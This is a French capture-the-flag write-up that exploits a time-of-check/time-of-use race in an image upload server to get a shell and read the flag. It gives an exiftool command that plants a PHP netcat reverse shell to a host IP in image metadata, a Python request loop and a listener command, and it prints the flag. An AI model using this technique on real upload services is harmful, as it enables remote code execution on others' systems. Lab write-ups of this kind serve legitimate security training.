# High security Flight Plans Server

## Consignes :


Le serveur des plans de vols est disponible et est réputé inviolable. A vous de trouver la vulnérabilité et de lire le fichier flag à la racine du serveur web.

## Points attribués :
```
35 Points
```

## Flag :
```
Fl@g{T1m3_0f_Ch3ck_t1m3_0f_U53!}
```

## Déroulé :

Une page de téléversement de plans de vols est disponible.
L'information remarquable ici est que les fichiers ne doivent pas dépassés 5Mo. Les seules extensions autorisées sont : jpeg, png, gif.

Lorsque l'on essaye de téléverser une image de type jpeg, on peut remarquer qu'une miniature(thumbnail) de notre image est générée et que notre image est disponible en visualisation.

![Test de fonctionnalitées basiques](assets/images/start.png)

Si l'on clique sur le lien, on peut voir que notre image a été renommée et est disponible dans le dossier "/temp/".

![Lien image téléchargé](assets/images/image.png)

En examinant le nom de notre image, on remarque que le nom qu'il lui est attribué est le condensat md5 de notre image.

![Image renommé MD5](assets/images/md5.png)

Il y a actuellement 2 possibilitées de fonctionnement de l'application de téléversement.
La première découle du fait que l'on peut imaginer que l'application vérifie tout d'abord le type du fichier avant de procéder à la génération de la miniature.
La seconde est totalement inverse et part du postulat que la génération de la miniature est effectuée en premier et que par conséquent le type n'est vérifié qu'après.

Si l'on retente de téléverser une image plus volumineuse (4.5Mo), on remarque que l'application met plus de temps à générer la miniature.
La seconde possibilité est donc sûrement plus envisageable que la première.

On va essayer d'exploiter la méthode de TOCTOU(Time Of Check - Time Of Use) qui est en résumé une vulnérabilité "race condition". Nous allons injecter du code php dans le DocumentName de l'image de 4.5Mo. De plus, l'extension sera spécifiée php. Le but étant de calculer le condensat md5 de notre exploit et d'essayer avec un script d'activer notre exploit avant que l'application ne vérifie le type de l'image (pendant la génération de la miniature).

Afin d'injecter le code php dans l'image, il est possible d'utiliser 'exiftool' comme suit :
```
exiftool -DocumentName='<?php shell_exec("nc -e /bin/bash 172.18.0.1 4444");?>' 4k-image-tiger-jumping.jpg
``` 

Avant de téléverser notre image avec l'injection, il est necessaire d'éxécuter le script afin de joindre notre exploit, le faire éxécuter avant ça suppression ou ça modification d'extension et de mettre en place notre écoute sur le port 4444.

```
#!/bin/python2.7

import requests
import os

hashmd5 = "7da77c379dfd1a1c987227b0437328e2"
url = "http://localhost:8081/temp/" + hashmd5 + ".php"

while 1:
	print(url)
	r = requests.get(url)
```

```
nc -nlvp 4444
```

A la suite de l'éxecution du script python et de la commande netcat, il faut téléverser l'image sur le serveur web. Il en découle le retour shell du serveur et l'image est de plus disponible en format jpeg sur le serveur.

![Obtention shell](assets/images/shell.png)

Ce shell nous permet de lire le fichier flag situé à la racine du serveur web.

```
cat /flag
Fl@g{T1m3_0f_Ch3ck_t1m3_0f_U53!}
```